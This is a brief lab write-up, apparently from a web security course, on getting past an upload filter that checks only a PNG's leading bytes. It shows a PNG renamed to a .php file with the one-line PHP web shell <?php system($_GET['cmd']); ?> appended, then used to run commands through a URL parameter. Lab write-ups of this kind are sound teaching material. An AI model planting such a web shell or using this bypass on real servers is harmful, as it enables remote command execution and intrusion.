Insecure file upload 0x02
The filter does run server side: on the first attempt it reports that .php extensions are not allowed.
In reality, though, it is only checking the format data of the file (the leading bytes that identify it as an image), not the extension itself.
So we can keep a valid PNG header and insert our PHP payload into the PNG data, as in the details below.
Rename the file from tcm-logo.png to cmd3.php and append the PHP payload to the PNG data:
<?php system($_GET['cmd']); ?>

The upload is accepted, and requesting cmd3.php now executes the PHP: whatever is passed in the cmd GET parameter (for example ?cmd=id) is run through system() and its output is returned in the response.

